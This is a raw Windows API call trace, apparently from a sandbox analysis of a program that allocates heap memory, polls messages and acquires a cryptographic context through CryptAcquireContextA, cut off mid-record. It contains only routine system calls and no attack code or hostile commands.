[0245.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0245.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0245.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0245.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0245.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0245.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0245.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0245.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0245.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0245.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0245.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0245.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0245.021] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0245.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0245.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0245.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0245.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0245.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0245.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0245.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0245.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0245.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0245.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0245.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0245.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0245.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0245.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0245.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0245.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0245.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0245.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0245.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0245.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0245.022] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0245.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0245.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0245.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0245.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0245.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0245.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0245.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0245.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0245.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0245.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0245.023] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0245.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0245.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0245.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0245.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0245.024] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0245.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0245.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0245.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0245.024] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0245.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0245.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0245.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0245.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0245.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0245.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0245.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0245.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0245.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0245.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0245.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0245.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0245.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0245.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0245.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0245.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0245.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0245.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0245.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0245.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0245.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0245.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0245.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0245.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0245.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0245.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0245.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0245.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0245.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0245.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0245.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0245.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0245.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0245.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0245.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0245.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0245.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0245.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0245.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0245.027] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0245.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0245.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0245.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0245.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0245.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0245.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0245.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0245.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0245.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0245.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0245.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0245.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0245.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0245.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0245.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0245.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0245.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0245.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0245.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0245.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0245.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0245.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0245.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0245.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0245.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0245.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0245.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0245.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0245.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0245.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0245.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0245.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0245.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0245.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0245.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0245.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0245.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0245.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0245.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0245.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0245.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0245.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0245.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0245.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0245.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0245.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0245.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0245.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0245.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0245.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0245.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0245.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69bc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0245.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0245.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0245.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0245.030] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0245.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0245.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55df8 [0245.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0245.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0245.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0245.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e699e8 [0245.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e699e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0245.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0245.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0245.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0245.031] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0245.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0245.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0245.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0245.031] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0245.032] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.033] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.033] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0245.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0245.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.033] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0245.033] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0245.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0245.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0245.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0245.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0245.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0245.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0245.034] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0245.034] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0245.034] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0245.035] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0245.035] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0245.035] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0245.035] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0245.035] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56060 [0245.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0245.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0245.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56060 